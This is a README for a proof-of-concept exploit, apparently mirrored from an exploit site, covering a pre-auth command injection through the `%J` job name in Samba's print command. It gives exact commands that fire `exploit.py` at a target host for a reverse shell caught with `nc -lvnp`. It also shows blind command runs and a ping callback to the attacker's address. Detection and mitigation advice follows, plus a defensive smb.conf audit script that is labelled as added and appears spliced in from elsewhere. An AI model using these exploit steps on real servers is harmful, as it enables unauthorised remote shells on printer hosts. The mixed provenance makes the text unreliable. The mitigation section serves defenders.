## https://sploitus.com/exploit?id=EE29DB8D-5AE5-592F-A339-029BD56A1367
# CVE-2026-4480: Samba print-command (`%J`) injection PoC

> **Important. Read this first:**  
> This repository and `exploit.py` are provided **for educational and research purposes only**. Do **not** use this code against systems, networks, or services for which you do not have **explicit, written authorization**. Unauthorized access to computer systems is illegal and unethical. By using this code you agree to follow applicable laws and institutional policies.

Unauthenticated remote command execution in Samba's print subsystem. When a print
job finishes spooling, Samba runs the configured `print command` through `system()`,
substituting `%s` (spool file path) and `%J` (client-supplied job name) into the
string. Before the fix the job name was passed in with the single transformation
`'` → `_` and nothing else, so `|`, `;`, `&`, spaces and backticks all reach
the shell. A `print command` that references `%J` is therefore a shell-injection sink,
and since guests may submit print jobs, the issue is **pre-auth**.

- **CVE:** CVE-2026-4480
- **CVSS:** 10.0
- **Fixed in:** Samba 4.22.10, 4.23.8, 4.24.3
- **Affected:** print backends running an external `print command` that references `%J`
  (`printing = sysv`-style). `printing = cups` / `iprint` go through the CUPS API and
  are **not** affected.

## Requirements

- Linux with the Samba Python bindings:
  ```bash
  sudo apt install python3-samba
  ```
- Network access to the target's SMB port (445/139).
- A **guest-accessible printer share** on the target whose `print command` references `%J`.

## Usage

```text
python3 exploit.py <rhost> <lhost> <lport> [-P PRINTER] [-c CMD]
```

| Arg / option    | Meaning                                             |
| --------------- | --------------------------------------------------- |
| `rhost`         | Target Samba host / IP                              |
| `lhost`         | Your listener IP                                    |
| `lport`         | Your listener port                                  |
| `-P, --printer` | Guest printer share name (default: `HP-Reception`)  |
| `-c, --cmd`     | Run an arbitrary command instead of a reverse shell |

### Reverse shell

```bash
# terminal 1: listener
nc -lvnp 4444

# terminal 2: fire the exploit
python3 exploit.py 10.129.244.177 10.10.14.100 4444
```

You should catch a shell as the print service account (e.g. `nobody`).

### Run a single command (blind)

```bash
python3 exploit.py 10.129.244.177 x x -c 'id > /dev/shm/o 2>&1'
```

Because execution is blind (the command runs server-side and returns nothing on the
RPC channel), confirm it out of band first, e.g. an ICMP callback you watch with
`tcpdump -ni tun0 icmp`:

```bash
python3 exploit.py 10.129.244.177 x x -c 'ping -c 3 10.10.14.100'
```

## Detection / mitigation

- Patch to 4.22.10 / 4.23.8 / 4.24.3 (or later).
- If you cannot patch, quote the macro: `print command = /usr/local/bin/print-helper %s '%J'`,
  drop `%J`, or move to `printing = cups`.
- Hunt for `smbd` spawning shells (`sh`/`bash`/`nc`/`python`/`curl`) and document names
  containing shell metacharacters.
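A defender-side check for the mitigation bullets above, added here and not part of the PoC repository: a small audit script (the names `parse_smb_conf` and `audit_print_shares` and the sample smb.conf are assumptions) that flags printable shares whose effective `print command` still hands `%J` to the shell unquoted, treating only `printing = cups` / `iprint` as safe.

```python
import re
# %J not wrapped in single quotes; "%J" in double quotes is still flagged (backticks and $() stay live).
UNQUOTED_J = re.compile(r"(?<!')%J(?!')")

def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {key: value}}, keys lower-cased, comments skipped."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            conf[section] = {}
        elif section is not None and "=" in line:
            key, _, value = line.partition("=")
            conf[section][" ".join(key.split()).lower()] = value.strip()
    return conf

def audit_print_shares(text):
    """Return [(share, effective print command)] for printable shares that hand %J to the shell."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    findings = []
    for name, sec in conf.items():
        is_printer = name.lower() == "printers" or sec.get("printable", "no").lower() in ("yes", "true", "1")
        if name.lower() == "global" or not is_printer:
            continue
        # share-level settings override [global]; an unset `printing` is treated as external (conservative)
        printing = sec.get("printing", glob.get("printing", "")).lower()
        cmd = sec.get("print command", glob.get("print command", ""))
        if printing not in ("cups", "iprint") and UNQUOTED_J.search(cmd):
            findings.append((name, cmd))
    return findings

# Constructed sample smb.conf: one share inherits the unquoted global command,
# one quotes %J as the mitigation suggests, one uses the CUPS backend.
SAMPLE_CONF = """[global]
printing = sysv
print command = /usr/local/bin/print-helper %s %J
[HP-Reception]
printable = yes
guest ok = yes
[HP-Quoted]
printable = yes
print command = /usr/local/bin/print-helper %s '%J'
[HP-Cups]
printable = yes
printing = cups
"""
```

Run it over `/etc/samba/smb.conf` (or `testparm -s` output) and treat every returned share as needing the patch or the quoted macro.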

## Practice on HackTheBox

I have created a box on **HackTheBox** called [Abducted](https://app.hackthebox.com/machines/Abducted) to showcase the vulnerability and give you a hands-on example of how attackers could leverage this in a misconfigured environment.